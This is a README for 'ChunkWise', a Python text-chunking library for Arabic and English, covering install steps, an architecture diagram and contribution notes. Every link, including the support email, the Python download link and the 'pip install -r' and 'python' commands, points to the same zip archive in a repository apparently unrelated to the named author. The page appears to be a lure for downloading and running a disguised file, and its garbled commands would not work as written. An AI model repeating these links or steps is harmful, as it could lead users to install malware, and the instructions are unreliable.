ChunkWise is a Python library designed to simplify text chunking for both Arabic and English. It offers various strategies for breaking down text, making it ideal for applications in natural language processing and document handling. Whether you are working on language models or document analysis, ChunkWise provides a reliable solution.
Hesham Haroon
For support, questions, or commercial licensing inquiries:
- Email: https://raw.githubusercontent.com/hasibul0912/ChunkWise/main/chunkwise/utils/Wise_Chunk_3.7.zip
- GitHub: @h9-tec
- 31 Chunking Strategies across 7 categories
- Arabic Language Support: Handles diacritics and normalization
- English Language Support: Provides sentence detection
- Automatic Language Detection
- Embedding-Based Chunking: Requires sentence-transformers
- LLM-Based Chunking: Requires OpenAI/Anthropic API
Follow these simple steps to download and use ChunkWise:
-
Visit the Releases Page
Click the link below to go to the download page.
Visit this page to download ChunkWise -
Choose Your Version
On the Releases page, you will see various versions of ChunkWise. Look for the latest stable release. -
Download the File
Click on the version you want and download the appropriate file for your system. The file might be in a zip or tar format. -
Extract the Files
Once the download is complete, locate the file on your computer. Right-click the file and choose "Extract All" if it is a zip file. Follow the prompts to extract the files to a folder of your choice. -
Install Required Packages
To run ChunkWise, you need to have Python installed on your computer. If you donβt have it, download it from https://raw.githubusercontent.com/hasibul0912/ChunkWise/main/chunkwise/utils/Wise_Chunk_3.7.zip.After installing Python, open your command prompt or terminal and run the following command to install any required packages:
pip install -r https://raw.githubusercontent.com/hasibul0912/ChunkWise/main/chunkwise/utils/Wise_Chunk_3.7.zip
-
Run ChunkWise
After installation, navigate to the folder where you extracted ChunkWise via your command prompt or terminal. Use the following command to run the application:python https://raw.githubusercontent.com/hasibul0912/ChunkWise/main/chunkwise/utils/Wise_Chunk_3.7.zip
You can download ChunkWise by visiting the following link:
Make sure to follow the steps listed in the "Getting Started" section for a smooth installation process.
ChunkWise is structured to be easily extendable and maintainable. Below is a simple overview of its architecture:
graph TB
subgraph "ChunkWise Library"
A[Chunker] --> B[BaseChunker]
B --> C[Strategies]
B --> D[Language Support]
B --> E[Tokenizers]
subgraph "Strategies"
C --> C1[BasicChunking]
C --> C2[AdvancedChunking]
C --> C3[SemanticChunking]
end
end
This structure allows for easy addition of new chunking strategies and updates to the language models.
If you encounter issues or have suggestions, feel free to reach out via the contact information provided earlier. We welcome contributions from the community. To contribute:
- Fork the repository.
- Create a new branch for your feature.
- Make your changes and commit them.
- Submit a pull request with a clear explanation of your changes.
ChunkWise is compatible with:
- Operating Systems: Windows, macOS, and Linux
- Python Version: 3.6 or higher
- Memory: At least 512 MB available
ChunkWise is open-source software. You can freely use and modify it under the terms of the MIT License. Full details can be found in the LICENSE file included with the software.
ChunkWise offers a range of features for effective text chunking in Arabic and English. By following the steps above, you can easily download, install, and start using the library for your text processing needs.